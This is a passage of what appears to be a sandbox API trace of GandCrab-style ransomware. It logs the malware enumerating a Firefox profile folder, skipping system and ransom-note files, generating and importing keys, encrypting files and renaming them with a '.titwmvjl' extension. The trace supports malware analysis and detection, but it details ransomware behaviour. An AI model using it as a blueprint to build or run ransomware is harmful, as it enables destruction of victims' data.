37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0084.093] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0084.094] CloseHandle (hObject=0x2d4) returned 1 [0084.094] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.094] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.094] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1d, wMilliseconds=0x196)) [0084.094] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.095] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.095] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.095] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a09d2ca4deb61a.lock") returned 125 [0084.095] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0084.096] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.096] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.096] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\") returned 101 [0084.096] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*" [0084.096] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x5037b8 [0084.096] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.097] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0084.098] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.098] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.098] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0084.098] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0084.098] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0084.098] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a09d2ca4deb61a.lock" [0084.098] lstrlenW (lpString=".titwmvjl") returned 9 [0084.098] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a09d2ca4deb61a.lock") returned 125 [0084.098] VirtualAlloc (lpAddress=0x0, dwSize=0x13a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.098] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 134 [0084.099] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a09d2ca4deb61a.lock") returned 125 [0084.099] lstrlenW (lpString=".lock") returned 5 [0084.099] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.099] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lock ") returned 6 [0084.099] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.099] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.100] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0084.100] lstrcmpW (lpString1="previous.js", lpString2=".") returned 1 [0084.100] lstrcmpW (lpString1="previous.js", lpString2="..") returned 1 [0084.100] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\", lpString2="previous.js" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js" [0084.100] lstrlenW (lpString=".titwmvjl") returned 9 [0084.100] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js") returned 112 [0084.100] VirtualAlloc (lpAddress=0x0, dwSize=0x120, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.100] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js.titwmvjl") returned 121 [0084.100] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js") returned 112 [0084.100] lstrlenW (lpString=".js") returned 3 [0084.100] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.100] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".js ") returned 4 [0084.100] lstrcmpiW (lpString1=".js", lpString2=".titwmvjl") returned -1 [0084.100] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.100] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js") returned 112 [0084.100] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js") returned 112 [0084.100] lstrcmpiW (lpString1="previous.js", lpString2="desktop.ini") returned 1 [0084.100] lstrcmpiW (lpString1="previous.js", lpString2="autorun.inf") returned 1 [0084.100] lstrcmpiW (lpString1="previous.js", lpString2="ntuser.dat") returned 1 [0084.100] lstrcmpiW (lpString1="previous.js", lpString2="iconcache.db") returned 1 [0084.100] lstrcmpiW (lpString1="previous.js", lpString2="bootsect.bak") returned 1 [0084.100] lstrcmpiW (lpString1="previous.js", lpString2="boot.ini") returned 1 [0084.100] lstrcmpiW (lpString1="previous.js", lpString2="ntuser.dat.log") returned 1 [0084.101] lstrcmpiW (lpString1="previous.js", lpString2="thumbs.db") returned -1 [0084.101] lstrcmpiW (lpString1="previous.js", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0084.101] lstrcmpiW (lpString1="previous.js", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0084.101] lstrcmpiW (lpString1="previous.js", lpString2="KRAB-DECRYPT.html") returned 1 [0084.101] lstrcmpiW (lpString1="previous.js", lpString2="CRAB-DECRYPT.html") returned 1 [0084.101] lstrcmpiW (lpString1="previous.js", lpString2="KRAB-DECRYPT.txt") returned 1 [0084.101] lstrcmpiW (lpString1="previous.js", lpString2="CRAB-DECRYPT.txt") returned 1 [0084.101] lstrcmpiW (lpString1="previous.js", lpString2="ntldr") returned 1 [0084.101] lstrcmpiW (lpString1="previous.js", lpString2="NTDETECT.COM") returned 1 [0084.101] lstrcmpiW (lpString1="previous.js", lpString2="Bootfont.bin") returned 1 [0084.101] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js") returned 112 [0084.101] lstrlenW (lpString=".js") returned 3 [0084.101] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.101] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".js ") returned 4 [0084.101] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.101] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.101] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\previous.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x248 [0084.102] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.102] ReadFile (in: hFile=0x248, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e4f8*=0x21c, lpOverlapped=0x0) returned 1 [0084.113] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.113] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.113] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0084.117] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.117] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.117] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.117] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0084.117] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.117] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.117] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.118] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.118] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0084.121] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.121] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.121] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.121] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0084.121] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.122] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.122] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.122] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0084.124] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.125] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503938) returned 1 [0084.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.125] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0084.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.125] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0084.125] GetLastError () returned 0x0 [0084.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.125] CryptDestroyKey (hKey=0x503938) returned 1 [0084.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.125] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.126] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.126] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0084.128] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.128] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503378) returned 1 [0084.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.129] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0084.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.129] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0084.129] GetLastError () returned 0x0 [0084.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.129] CryptDestroyKey (hKey=0x503378) returned 1 [0084.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.129] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.129] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0084.130] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0084.130] ReadFile (in: hFile=0x248, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e4f8*=0x29d43, lpOverlapped=0x0) returned 1 [0084.166] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffd62bd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.166] WriteFile (in: hFile=0x248, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x29d43, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e4dc*=0x29d43, lpOverlapped=0x0) returned 1 [0084.186] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.186] WriteFile (in: hFile=0x248, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0084.187] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.192] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.192] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.193] CloseHandle (hObject=0x248) returned 1 [0084.194] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\previous.js"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\previous.js.titwmvjl"), dwFlags=0x1) returned 1 [0084.194] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.194] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0084.194] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0084.194] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0084.195] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\", lpString2="TITWMVJL-DECRYPT.txt" | out: 